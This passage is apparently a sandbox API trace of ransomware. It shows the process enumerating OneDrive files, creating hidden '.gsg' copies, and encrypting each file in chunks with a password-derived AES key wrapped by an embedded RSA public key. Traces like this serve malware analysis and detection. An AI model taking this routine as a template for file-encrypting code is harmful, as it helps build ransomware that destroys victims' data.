lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.213] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.213] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0276.213] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.213] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.213] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.213] GetLastError () returned 0x0 [0276.214] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.214] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.215] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.216] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.219] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.219] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a960) returned 1 [0276.222] CryptCreateHash (in: hProv=0x2f2a960, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.222] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0276.222] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.222] CryptDeriveKey (in: hProv=0x2f2a960, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb548) returned 1 [0276.222] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.222] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.222] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b598) returned 1 [0276.223] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b598, dwCertEncodingType=0x1, pInfo=0x2f35760*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35790*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35798*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb2c8) returned 1 [0276.223] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.223] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b0d0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b0d0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.223] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2b0d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b0d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.224] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.244] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.244] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.261] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.261] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.261] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.262] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.262] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.262] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.262] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.263] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.263] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.263] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.263] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.264] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.264] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.264] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.264] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.264] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.264] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.265] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.265] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.265] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.265] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.265] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.265] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.265] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.266] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.266] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.266] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.267] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.267] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.267] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.267] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.267] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.267] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.267] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.267] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.267] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.268] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.268] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.268] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.268] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.268] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.268] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.268] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.268] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.268] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.268] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.268] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.268] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.269] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.269] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.269] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.269] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.269] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, 